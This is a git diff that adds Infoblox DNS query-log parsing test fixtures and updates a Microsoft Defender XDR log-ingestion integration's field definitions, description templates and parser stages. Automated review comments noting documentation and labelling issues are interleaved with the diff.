@@ -0,0 +1,36 @@ +{ + "input": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE" + }, + "expected": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.org", + "registered_domain": "test.org", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 12337 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json new file mode 100644 index 000000000..e52e2b96b --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_4.json @@ -0,0 +1,37 @@ +{ + "input": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A" + }, + "expected": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "_ldap._tcp.test.test.net", + "registered_domain": "test.net", + "subdomain": "_ldap._tcp.test", + "top_level_domain": "net", + "type": "SRV" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "_ldap._tcp.test.test.net" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37188 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json new file mode 100644 index 000000000..e8b9350f6 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_5.json 
@@ -0,0 +1,46 @@ +{ + "input": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io." + }, + "expected": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.", + "dns": { + "answers": [ + { + "class": "IN", + "data": "test.test.io.", + "name": "test.test.io.", + "ttl": 86400, + "type": "CNAME" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.io", + "registered_domain": "test.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37521 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json new file mode 100644 index 000000000..c3e9d8ddc --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_6.json 
@@ -0,0 +1,81 @@ +{ + "input": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1" + }, + "expected": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1", + "dns": { + "answers": [ + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.org", + "registered_domain": "test.org", + "subdomain": "test", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 40432 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json new file mode 100644 index 000000000..7e8b80b01 --- /dev/null 
+++ b/Infoblox/ddi/tests/query_log_dns_7.json 
@@ -0,0 +1,115 @@ +{ + "input": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;" + }, + "expected": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 
235 IN A 192.168.1.1;", + "dns": { + "answers": [ + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 11720, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "c8.c3r2fb7.81hxxxxxx.dev.", + "ttl": 67, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 52, + "type": "CNAME" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "xxxxxx.dev.", + "ttl": 235, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.dev", + "registered_domain": "test.dev", + "top_level_domain": "dev", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.dev" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 49943 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json new file mode 100644 index 000000000..72f737796 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_8.json 
@@ -0,0 +1,45 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;", + "@timestamp": "2024-11-28T15:26:27.498000Z", + "dns": { + "answers": [ + { + "class": "IN", + "data": "10.56.12.201", + "name": "test.dev.", + "ttl": 3600, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "PD2LORA2.enim.l2", + "subdomain": "PD2LORA2.enim", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "PD2LORA2.enim.l2" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 36615 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json new file mode 100644 index 000000000..ae3c85ca0 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_9.json 
@@ -0,0 +1,124 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 
17 IN A 1.2.3.175;", + "@timestamp": "2024-11-28T15:26:27.359000Z", + "dns": { + "answers": [ + { + "class": "IN", + "data": "www-www.bing.com.trafficmanager.net.", + "name": "www.bing.com.", + "ttl": 7072, + "type": "CNAME" + }, + { + "class": "IN", + "data": "www.bing.com.edgekey.net.", + "name": "www-www.bing.com.trafficmanager.net.", + "ttl": 56, + "type": "CNAME" + }, + { + "class": "IN", + "data": "e86303.test.xxxxx.net.", + "name": "www.bing.com.edgekey.net.", + "ttl": 7154, + "type": "CNAME" + }, + { + "class": "IN", + "data": "1.2.3.181", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.173", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.184", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.185", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.174", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.183", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.177", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.179", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.175", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "www.bing.com", + "registered_domain": "bing.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "www.bing.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63175 + } + } +} \ No newline at end of file 
diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type: name: microsoft.defender.observer.interface.type type: keyword +microsoft.defender.operation.properties: + description: Additional properties of the operation + name: microsoft.defender.operation.properties + type: object + microsoft.defender.report.id: description: Unique identifier for the event name: microsoft.defender.report.id @@ -816,6 +821,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml index 8c04f8c1a..9ce3b7c52 100644 --- a/Microsoft/microsoft-365-defender/_meta/manifest.yml +++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml 
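Review bot: The two new `process.parent.user.domain` and `process.parent.user.email` entries in the `-816,6 +821,16` hunk ship with `description: ''`, while the neighbouring `process.user.domain` entry documents what its field holds. Since this commit's parser maps them from `InitiatingProcessAccountDomain` and `InitiatingProcessAccountUpn`, wording along the lines of `description: Domain of the account that ran the parent (initiating) process` and `description: UPN of the account that ran the parent (initiating) process` would give analysts the same footing as the existing `process.user.*` fields. The `microsoft.defender.operation.properties` entry in the first hunk is documented and needs no change.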
@@ -1,10 +1,10 @@ uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f -name: Microsoft 365 Defender +name: Microsoft Defender XDR / Microsoft 365 Defender slug: microsoft-365-defender automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac description: >- - Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. + Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. data_sources: diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -1,4 +1,25 @@ [ + { + "value": "A new {action.type} cloud app event have been received", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" } + ] + }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ 
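Review bot: The first new description in the `-1,4 +1,25` hunk reads `A new {action.type} cloud app event have been received`; the subject is singular, so it should be `has been received`. The second entry labels the same `cloud_app_events` dataset as an "incident", the word this file otherwise reserves for alert/investigation records, which may mislead analysts triaging cloud-app activity. Its conditions are also a strict superset of the first entry's, so if descriptions are matched in order the more specific entry is unreachable; the `LogonFailed` rule added further down places the specific rule before the generic one, and the two entries here would presumably need the same ordering.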
@@ -132,6 +153,35 @@ } ] }, + { + "value": "{user.domain}\\{user.name} failed to log on {host.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "device_logon_events" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "user.domain" + }, + { + "field": "action.type", + "value": "LogonFailed" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ @@ -402,6 +452,28 @@ { "field": "email.to.address" } ] }, + { + "value": "{event.action} email from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{event.action} email from {email.from.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" } + ] + }, + { + "value": "{event.action} email to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.to.address" } + ] + }, { "value": "{action.type} on {url.original}", "conditions": [ diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f22b21ce1..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
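Review bot: The new `LogonFailed` entry in the `-132,6 +153,35` hunk declares a relationship with `"type": "logged on"` between `user.name` and `host.name`, but the event it describes is a failed logon, so the relationship graph would assert a session that never existed. A distinct type such as `"type": "failed to log on"`, or omitting the relationship for failures, keeps the edge faithful to the event; failed-logon bursts are exactly what analysts pivot on, so a spurious "logged on" edge is actively misleading.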
@@ -40,6 +40,10 @@ pipeline:
 input_field: "{{json_event.message.properties.RawEventData.Data}}"
 output_field: "data"
 - name: set_common_fields
+ - name: set_process_events
+ filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
+ - name: set_process_deviceprocess_events
+ filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
 - name: set_alert_evidence_fields
 filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
 - name: set_alert_info_fields
@@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: 
"{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" 
@@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: 
"{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" 
@@ -250,15 +226,117 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' + - set: + network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" + filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + - set: + microsoft.defender.operation.properties: > + { + {%- for property in json_event.message.properties.RawEventData.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | 
dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: 
"{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + - set: process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: - set: - network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" - filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: 
"{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + 
